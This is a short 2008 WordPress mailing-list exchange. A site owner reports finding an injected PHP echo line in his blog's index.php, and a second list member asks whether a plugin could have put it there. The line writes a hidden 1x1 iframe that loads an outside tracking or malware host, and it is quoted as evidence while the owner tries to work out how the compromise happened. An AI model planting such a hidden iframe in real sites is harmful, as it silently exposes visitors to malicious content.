[wp-hackers] XSS vuln in wordpress 2.7 ?

Dan Gayle dangayle at gmail.com
Mon Dec 22 17:31:15 GMT 2008


Wow. That's nasty, and malicious. Could a plugin do that?

On Dec 22, 2008, at 9:27 AM, madalin wrote:

> Hello,
>
> For some reason i found my blog's index.php (not theme's index.php)
> with the following piece of code right before the ?>
>
> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>
> I tried looking at the logs. No luck. The file's permisions look  
> like this:
>
> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/ 
> index.php
>
> I'm still trying to figure out how that line got there. I've
> downloaded wordpress right from wordpress.org, and the server is a
> dedicated one, only two users with shell access to it.
>
> Any suggestions ?
>
> -- 
> Regards,
> madalin
> http://madalin.eu
> http://www.tg-jiu.ro
> http://www.radioomega.ro
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers



More information about the wp-hackers mailing list